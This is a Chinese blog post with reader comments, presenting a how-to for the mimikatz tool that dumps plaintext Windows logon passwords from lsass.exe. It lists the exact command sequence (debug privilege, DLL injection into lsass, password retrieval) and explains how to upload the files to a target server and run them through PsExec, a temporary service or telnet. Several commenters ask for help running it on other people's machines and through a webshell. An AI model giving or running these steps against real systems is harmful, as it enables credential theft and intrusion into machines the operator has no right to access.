介绍一下神器mimikatz,从lsass里抓密码

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,管理员身份运行:

//开始运行神器
mimikatz
//提升权限
privilege::debug
//注入dll
inject::process lsass.exe sekurlsa.dll
//抓取密码
@getLogonPasswords

不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

这个咪咪卡住啦,支持

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

在远程终端(3389、mstsc.exe、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

//最简单实用的方法,使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit

//*********************************************************

//使用 At 启动
at ***

//*********************************************************

//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword

//*********************************************************

//telnet 远程命令管道
telnet ****
本文标题:介绍一下神器mimikatz,从lsass里抓密码
本文链接:https://www.nigesb.com/introduction-of-mimikatz.html
订阅本站:http://www.nigesb.com/feed
转载请注明来源,如果喜欢本站可以Feed订阅本站。

发表评论?

39 条评论。

  1. 这个只能64位么?

  2. 这个我进行到第二步就没法注入了真是奇了怪了,是不是因为权限的问题了?

  3. 说拒绝访问ID=580

  4. 分享到百度空间没内容了

  5. 嗯,果然是神器

  6. 我win7 32位系统 以管理员身份运行,
    运行到第二步时 提示
    processentry32(lsass.exe).th32processID=508
    erreur:Impossible d’injecter!;拒绝访问
    。。。。

  7. 问下哦,我在我自己机器上运行是可以的,有效。
    当我把他上传到目标PC的共享文件夹下运行的时候,那个inject的绝对路径该如何写呢?

    我该写的我的磁盘的映射路径还是目标PC共享文件夹下的路径。
    前者我试了,就是inject完之后停在Attente de connexion du client…不会动

    据我猜测语法应该是和目标PC无法连接上,远程运行的话绝对路径是该怎么写的呢
    谢了

  8. 多谢回复可是还是不大明白。
    我已上传好.exe
    命令为C:>copy mimikatz_trunk.7z \\192.168.1.9\SharedDocs
    然后运行打开共享,解压
    然后在我的CMD下面如何远程执行里面的exe呢

  9. mimikatz # inject::process lsass.exe E:\mimikatz_trunk\Win
    PROCESSENTRY32(lsass.exe).th32ProcessID = 672
    Erreur : Impossible d’injecter ! ; (0x00000005) 拒绝访问。

    第二步的时候这样了。我电脑就只有一个administrator的管理员账号。还要设置什么权限吗?

  10. 执行到最后一步:@getLogonPasswords

    提示无法找到getLogonPasswords

    内容提示如下:methode ‘getlogonpasswords’ introuvable!

    开始以为是支持大小写,但是就算是大写之后也为是这个样子

    测试版本,windows 7 sp1 管理员身份运行

  11. 如何保存提取到的密码呢?我试了很多次,都无法导出为文本

  12. 可以获取QQ密码么?

  13. 兄弟能不能提供
    mimikatz_trunk\tools\PsExec.exe

    mimikatz_trunk\Win32\sekurlsa.dll
    这2个下载地址,还有cmd模式下如何运行啊 在菜刀上

发表评论


注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>